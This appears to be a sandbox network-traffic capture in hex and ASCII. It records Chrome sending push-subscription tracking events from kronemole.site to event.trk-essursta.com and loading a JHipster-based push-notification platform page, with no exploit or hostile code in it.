                                                                          2023-11-21 16:58:47 UTC880OUTOPTIONS /register/event_log/v9e118mez8 HTTP/1.1
                                                                          Host: event.trk-essursta.com
                                                                          Connection: keep-alive
                                                                          Accept: */*
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          Origin: https://kronemole.site
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://kronemole.site/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:47 UTC880INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:47 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          expires: 0
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          access-control-allow-headers: content-type
                                                                          x-xss-protection: 1; mode=block
                                                                          pragma: no-cache
                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                          content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                                                                          access-control-allow-methods: POST
                                                                          x-frame-options: SAMEORIGIN
                                                                          access-control-expose-headers: Authorization, Link, X-Total-Count, X-pushPlatformApp-alert, X-pushPlatformApp-error, X-pushPlatformApp-params
                                                                          access-control-allow-origin: *
                                                                          vary: Origin
                                                                          vary: Access-Control-Request-Method
                                                                          vary: Access-Control-Request-Headers
                                                                          x-content-type-options: nosniff
                                                                          permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                                                                          access-control-max-age: 1800
                                                                          CF-Cache-Status: DYNAMIC
                                                                          2023-11-21 16:58:47 UTC882INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 42 58 50 43 77 52 53 25 32 42 73 25 32 46 78 71 54 43 67 43 76 46 46 50 69 31 63 71 5a 62 65 25 32 42 57 62 72 56 33 67 62 6f 30 4c 4c 45 41 77 39 78 58 38 56 45 47 44 62 54 67 62 62 41 75 5a 32 38 25 32 46 55 4c 74 46 62 65 72 6e 43 74 52 59 5a 32 4c 71 67 25 32 46 73 25 32 46 47 57 79 38 44 55 4a 54 46 38 62 6e 7a 4b 48 6a 30 37 73 30 6f 32 6a 50 4b 6a 36 6a 33 4f 50 61 75 4f 62 34 79 65 35 35 69 44 32 4a 6a 58 78 37 5a 41 61 4a 38 47 33 25 32 42 6c 67 63 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BXPCwRS%2Bs%2FxqTCgCvFFPi1cqZbe%2BWbrV3gbo0LLEAw9xX8VEGDbTgbbAuZ28%2FULtFbernCtRYZ2Lqg%2Fs%2FGWy8DUJTF8bnzKHj07s0o2jPKj6j3OPauOb4ye55iD2JjXx7ZAaJ8G3%2Blgc"}],"group":"cf-nel","m


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          44192.168.2.449792104.21.72.34435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:47 UTC882OUTPOST /register/event_log/v9e118mez8 HTTP/1.1
                                                                          Host: event.trk-essursta.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 200
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-type: application/json
                                                                          Accept: */*
                                                                          Origin: https://kronemole.site
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://kronemole.site/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:47 UTC883OUTData Raw: 7b 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 75 74 6d 53 6f 75 72 63 65 22 3a 22 31 30 39 31 31 31 34 37 35 32 22 2c 22 73 6f 75 72 63 65 4f 6e 65 22 3a 22 61 33 4a 76 62 6d 56 74 62 32 78 6c 4c 6e 4e 70 64 47 55 3d 22 2c 22 73 6f 75 72 63 65 54 77 6f 22 3a 22 33 35 31 31 39 31 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 22 2c 22 76 65 72 73 69 6f 6e 22 3a 38 31 36 2c 22 6d 65 73 73 61 67 65 22 3a 22 5c 22 73 75 62 73 63 72 69 62 65 5f 70 72 6f 6d 70 74 5c 22 22 2c 22 65 76 65 6e 74 22 3a 22 70 5f 73 75 62 73 63 72 69 62 65 5f 70 72 6f 6d 70 74 22 7d
                                                                          Data Ascii: {"timezone":"Europe/Zurich","utmSource":"1091114752","sourceOne":"a3JvbmVtb2xlLnNpdGU=","sourceTwo":"351191","sessionId":"","version":816,"message":"\"subscribe_prompt\"","event":"p_subscribe_prompt"}
                                                                          2023-11-21 16:58:47 UTC883INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:47 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          expires: 0
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          x-xss-protection: 1; mode=block
                                                                          pragma: no-cache
                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                          x-pushplatformapp-params:
                                                                          content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                                                                          x-pushplatformapp-alert: pushPlatformApp.pushSubscription.deleted
                                                                          x-frame-options: SAMEORIGIN
                                                                          access-control-expose-headers: Authorization, Link, X-Total-Count, X-pushPlatformApp-alert, X-pushPlatformApp-error, X-pushPlatformApp-params
                                                                          access-control-allow-origin: *
                                                                          vary: Origin
                                                                          vary: Access-Control-Request-Method
                                                                          vary: Access-Control-Request-Headers
                                                                          x-content-type-options: nosniff
                                                                          permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                                                                          CF-Cache-Status: DYNAMIC
                                                                          2023-11-21 16:58:47 UTC884INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 72 49 34 48 4b 6e 39 33 4e 25 32 46 50 39 4a 25 32 46 35 41 62 31 38 41 58 31 62 6e 74 31 67 64 39 56 55 4c 6f 62 7a 37 4c 72 71 62 6b 50 4b 48 6a 53 31 55 37 6e 36 61 57 78 5a 30 76 64 74 62 74 54 6b 63 6b 58 52 44 72 31 38 6c 45 72 39 25 32 42 30 5a 68 25 32 46 61 4f 4e 49 79 57 65 7a 4c 6f 73 45 53 55 6d 6e 71 46 36 6c 6e 51 56 75 38 49 55 66 41 48 44 77 50 25 32 42 50 78 53 64 70 75 52 42 67 34 77 44 35 76 50 6f 4c 6d 62 78 4a 47 44 76 70 4a 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61
                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rI4HKn93N%2FP9J%2F5Ab18AX1bnt1gd9VULobz7LrqbkPKHjS1U7n6aWxZ0vdtbtTkckXRDr18lEr9%2B0Zh%2FaONIyWezLosESUmnqF6lnQVu8IUfAHDwP%2BPxSdpuRBg4wD5vPoLmbxJGDvpJ"}],"group":"cf-nel","max_a


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          45192.168.2.449794104.21.72.34435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:48 UTC884OUTGET /register/event_log/v9e118mez8 HTTP/1.1
                                                                          Host: event.trk-essursta.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:48 UTC885INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:48 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          expires: 0
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          x-xss-protection: 1; mode=block
                                                                          pragma: no-cache
                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                          content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                                                                          content-language: en-US
                                                                          x-frame-options: SAMEORIGIN
                                                                          vary: Origin
                                                                          vary: Access-Control-Request-Method
                                                                          vary: Access-Control-Request-Headers
                                                                          last-modified: Wed, 15 Nov 2023 17:52:58 GMT
                                                                          x-content-type-options: nosniff
                                                                          permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uWcW8pjrHs7nqKBzCGycOXTrOLmm49eQPhQS6wJaSa39Yxo57ZnmAxqBzsUXoZVcosmEVmQuzEwTdhkAgXEiJLVZusbyqghiQeVRdt1CyBsLp%2BnNy5HzdfNeGe4OG2hRHoPmoOTn2BXR"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          2023-11-21 16:58:48 UTC886INData Raw: 43 46 2d 52 41 59 3a 20 38 32 39 61 37 61 63 35 37 66 37 37 30 38 34 62 2d 49 41 44 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                          Data Ascii: CF-RAY: 829a7ac57f77084b-IADalt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:48 UTC886INData Raw: 33 65 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 70 75 73 68 5f 70 6c 61 74 66 6f 72 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 50 75 73 68 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 20 70 6c 61 74 66 6f 72 6d 22 3e 0a 20
                                                                          Data Ascii: 3ea7<!DOCTYPE html><html class="no-js" lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>push_platform</title> <meta name="description" content="Push Notifications platform">
                                                                          2023-11-21 16:58:48 UTC888INData Raw: 36 30 30 3a 23 34 33 35 38 36 32 3b 2d 2d 73 75 72 66 61 63 65 2d 37 30 30 3a 23 33 32 34 32 34 39 3b 2d 2d 73 75 72 66 61 63 65 2d 38 30 30 3a 23 32 32 32 63 33 31 3b 2d 2d 73 75 72 66 61 63 65 2d 39 30 30 3a 23 31 31 31 36 31 38 3b 2d 2d 67 72 61 79 2d 35 30 3a 23 65 65 66 31 66 32 3b 2d 2d 67 72 61 79 2d 31 30 30 3a 23 64 64 65 32 65 34 3b 2d 2d 67 72 61 79 2d 32 30 30 3a 23 62 62 63 35 63 61 3b 2d 2d 67 72 61 79 2d 33 30 30 3a 23 39 38 61 38 61 66 3b 2d 2d 67 72 61 79 2d 34 30 30 3a 23 37 36 38 62 39 35 3b 2d 2d 67 72 61 79 2d 35 30 30 3a 23 35 34 36 65 37 61 3b 2d 2d 67 72 61 79 2d 36 30 30 3a 23 34 33 35 38 36 32 3b 2d 2d 67 72 61 79 2d 37 30 30 3a 23 33 32 34 32 34 39 3b 2d 2d 67 72 61 79 2d 38 30 30 3a 23 32 32 32 63 33 31 3b 2d 2d 67 72 61 79 2d
                                                                          Data Ascii: 600:#435862;--surface-700:#324249;--surface-800:#222c31;--surface-900:#111618;--gray-50:#eef1f2;--gray-100:#dde2e4;--gray-200:#bbc5ca;--gray-300:#98a8af;--gray-400:#768b95;--gray-500:#546e7a;--gray-600:#435862;--gray-700:#324249;--gray-800:#222c31;--gray-
                                                                          2023-11-21 16:58:48 UTC889INData Raw: 79 61 6e 2d 39 30 30 3a 23 31 32 34 35 35 35 3b 2d 2d 70 69 6e 6b 2d 35 30 3a 23 66 64 66 34 66 39 3b 2d 2d 70 69 6e 6b 2d 31 30 30 3a 23 66 36 63 63 65 30 3b 2d 2d 70 69 6e 6b 2d 32 30 30 3a 23 65 65 61 33 63 37 3b 2d 2d 70 69 6e 6b 2d 33 30 30 3a 23 65 37 37 61 61 65 3b 2d 2d 70 69 6e 6b 2d 34 30 30 3a 23 64 66 35 32 39 36 3b 2d 2d 70 69 6e 6b 2d 35 30 30 3a 23 64 38 32 39 37 64 3b 2d 2d 70 69 6e 6b 2d 36 30 30 3a 23 62 38 32 33 36 61 3b 2d 2d 70 69 6e 6b 2d 37 30 30 3a 23 39 37 31 64 35 38 3b 2d 2d 70 69 6e 6b 2d 38 30 30 3a 23 37 37 31 37 34 35 3b 2d 2d 70 69 6e 6b 2d 39 30 30 3a 23 35 36 31 30 33 32 3b 2d 2d 69 6e 64 69 67 6f 2d 35 30 3a 23 66 34 66 36 66 64 3b 2d 2d 69 6e 64 69 67 6f 2d 31 30 30 3a 23 63 63 64 33 66 35 3b 2d 2d 69 6e 64 69 67 6f 2d
                                                                          Data Ascii: yan-900:#124555;--pink-50:#fdf4f9;--pink-100:#f6cce0;--pink-200:#eea3c7;--pink-300:#e77aae;--pink-400:#df5296;--pink-500:#d8297d;--pink-600:#b8236a;--pink-700:#971d58;--pink-800:#771745;--pink-900:#561032;--indigo-50:#f4f6fd;--indigo-100:#ccd3f5;--indigo-
                                                                          2023-11-21 16:58:48 UTC890INData Raw: 38 32 34 31 30 3b 2d 2d 72 65 64 2d 37 30 30 3a 23 39 37 31 64 30 64 3b 2d 2d 72 65 64 2d 38 30 30 3a 23 37 37 31 37 30 61 3b 2d 2d 72 65 64 2d 39 30 30 3a 23 35 36 31 31 30 38 3b 2d 2d 70 72 69 6d 61 72 79 2d 35 30 3a 23 66 32 66 38 66 64 3b 2d 2d 70 72 69 6d 61 72 79 2d 31 30 30 3a 23 63 32 64 66 66 36 3b 2d 2d 70 72 69 6d 61 72 79 2d 32 30 30 3a 23 39 31 63 36 65 66 3b 2d 2d 70 72 69 6d 61 72 79 2d 33 30 30 3a 23 36 31 61 64 65 37 3b 2d 2d 70 72 69 6d 61 72 79 2d 34 30 30 3a 23 33 30 39 33 65 30 3b 2d 2d 70 72 69 6d 61 72 79 2d 35 30 30 3a 23 30 30 37 61 64 39 3b 2d 2d 70 72 69 6d 61 72 79 2d 36 30 30 3a 23 30 30 36 38 62 38 3b 2d 2d 70 72 69 6d 61 72 79 2d 37 30 30 3a 23 30 30 35 35 39 38 3b 2d 2d 70 72 69 6d 61 72 79 2d 38 30 30 3a 23 30 30 34 33 37
                                                                          Data Ascii: 82410;--red-700:#971d0d;--red-800:#77170a;--red-900:#561108;--primary-50:#f2f8fd;--primary-100:#c2dff6;--primary-200:#91c6ef;--primary-300:#61ade7;--primary-400:#3093e0;--primary-500:#007ad9;--primary-600:#0068b8;--primary-700:#005598;--primary-800:#00437
                                                                          2023-11-21 16:58:48 UTC892INData Raw: 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 20 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 2d 2d 62 73 2d 66 6f 6e 74 2d 6d 6f 6e 6f 73 70 61 63 65 3a 53 46 4d 6f 6e 6f 2d 52 65 67 75 6c 61 72 2c 20 4d 65 6e 6c 6f 2c 20 4d 6f 6e 61 63 6f 2c 20 43 6f 6e 73 6f 6c 61 73 2c 20 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 20 22 43 6f 75 72 69 65 72 20 4e 65 77 22 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 2d 2d 62 73 2d 67 72 61 64 69 65 6e 74 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 38 30 64 65 67 2c 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c
                                                                          Data Ascii: al, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";--bs-font-monospace:SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255,
                                                                          2023-11-21 16:58:48 UTC893INData Raw: 68 65 69 67 68 74 3a 31 2e 32 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 37 35 72 65 6d 20 2b 20 31 2e 35 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 7b 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 32 35 72 65 6d 20 2b 20 2e 39 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 7b 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 7d 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 72 65 6d 20 2b 20 2e 36 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 32 30 30 70 78 29 7b 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65
                                                                          Data Ascii: height:1.2}h1{font-size:calc(1.375rem + 1.5vw)}@media (min-width: 1200px){h1{font-size:2.5rem}}h2{font-size:calc(1.325rem + .9vw)}@media (min-width: 1200px){h2{font-size:2rem}}h3{font-size:calc(1.3rem + .6vw)}@media (min-width: 1200px){h3{font-size:1.75re
                                                                          2023-11-21 16:58:48 UTC894INData Raw: 20 20 20 20 20 20 20 76 61 72 20 68 65 61 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 63 73 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 6c 69 6e 6b 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 66 61 76 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 6c 69 6e 6b 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 73 73 2e 72 65 6c 20 3d 20 27 73 74 79 6c 65 73 68 65 65 74 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 73 73 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 63 73 73 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 61 76 2e
                                                                          Data Ascii: var head = document.getElementsByTagName('head')[0]; var css = document.createElement('link'); var fav = document.createElement('link'); css.rel = 'stylesheet'; css.type = 'text/css'; fav.
                                                                          2023-11-21 16:58:48 UTC896INData Raw: 20 27 70 75 73 68 70 72 65 6d 69 75 6d 2e 63 6f 6d 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 73 73 2e 68 72 65 66 20 3d 20 27 63 6f 6e 74 65 6e 74 2f 63 73 73 2f 6c 6f 61 64 69 6e 67 2d 6d 61 72 6b 65 74 62 6f 78 2e 63 73 73 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 61 76 2e 68 72 65 66 20 3d 20 27 66 61 76 69 63 6f 6e 2d 6d 61 72 6b 65 74 62 6f 78 2e 69 63 6f 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 65 6c 6f 67 6f 27 29 2e 69 6e 6e 65 72 54 65 78 74 20 3d 20 27 4d 42 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73
                                                                          Data Ascii: 'pushpremium.com' ) { css.href = 'content/css/loading-marketbox.css'; fav.href = 'favicon-marketbox.ico'; document.getElementById('pelogo').innerText = 'MB'; } else if (window.location.hos
                                                                          2023-11-21 16:58:48 UTC897INData Raw: 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 70 70 2d 6c 6f 61 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6a 68 69 70 73 74 65 72 2d 65 72 72 6f 72 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 66 6f 72 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 70 75 72 70 6f 73 65 20 61 6e 64 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 77 68 65 6e 20 61 70 70 20 72 65 6e 64 65 72 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 68 61 73 20 6f 63 63 75 72 72 65 64 20 3a 2d 28 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68
                                                                          Data Ascii: </div> <div class="app-loading"> <div id="jhipster-error" style="display: none"> ... This content is for troubleshooting purpose and will be removed when app renders --> <h1>An error has occurred :-(</h1> <h
                                                                          2023-11-21 16:58:48 UTC898INData Raw: 6e 67 20 73 74 65 70 73 3a 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6f 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 49 6e 73 74 61 6c 6c 20 6e 70 6d 20 64 65 70 65 6e 64 65 6e 63 69 65 73 20 77 69 74 68 20 74 68 65 20 63 6f 6d 6d 61 6e 64 20 3c 63 6f 64 65 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 72 65 64 22 3e 6e 70 6d 20 69 6e 73 74 61 6c 6c 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 42 75 69 6c 64 20 74 68 65 20 63 6c 69 65 6e 74 20 77 69 74 68 20 74 68 65 20 63 6f 6d 6d 61 6e 64 20 3c 63 6f 64 65 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 72 65 64 22 3e 6e 70 6d 20 72 75 6e 20 77 65 62 61 70 70 3a 62 75 69 6c 64 3c 2f 63 6f 64 65 3e 20 6f
                                                                          Data Ascii: ng steps:</p> <ol> <li>Install npm dependencies with the command <code style="color: red">npm install</code></li> <li> Build the client with the command <code style="color: red">npm run webapp:build</code> o
                                                                          2023-11-21 16:58:48 UTC900INData Raw: 20 20 20 20 20 20 20 20 20 4a 6f 69 6e 20 6f 75 72 20 63 68 61 74 20 72 6f 6f 6d 20 6f 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 74 65 72 2e 69 6d 2f 6a 68 69 70 73 74 65 72 2f 67 65 6e 65 72 61 74 6f 72 2d 6a 68 69 70 73 74 65 72 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 3e 47 69 74 74 65 72 2e 69 6d 3c 2f 61 3e 2e 20 50 6c 65 61 73 65 20 6e 6f 74 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 68 61 74 20 74 68 69 73 20 69 73 20 61 20 70 75 62 6c 69 63 20 63 68 61 74 20 72 6f 6f 6d 2c 20 61 6e 64 20 74 68 61 74 20 77 65 20 65 78 70 65 63 74 20 79 6f 75 20 74 6f 20 72 65 73 70 65 63 74 20 6f 74 68 65 72 20 70 65
                                                                          Data Ascii: Join our chat room on <a href="https://gitter.im/jhipster/generator-jhipster" target="_blank" rel="noopener noreferrer">Gitter.im</a>. Please note that this is a public chat room, and that we expect you to respect other pe
                                                                          2023-11-21 16:58:48 UTC901INData Raw: 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 73 65 72 76 69 63 65 57 6f 72 6b 65 72 2e 72 65 67 69 73 74 65 72 28 27 2f 73 65 72 76 69 63 65 2d 77 6f 72 6b 65 72 2e 6a 73 27 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 53 65 72 76 69 63 65 20 57 6f 72 6b 65 72 20 52 65 67 69 73 74 65 72 65 64 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d
                                                                          Data Ascii: () { navigator.serviceWorker.register('/service-worker.js') .then(function () { console.log('Service Worker Registered'); }); }); }
                                                                          2023-11-21 16:58:48 UTC902INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          46192.168.2.44979120.114.59.183443
                                                                          TimestampkBytes transferredDirectionData
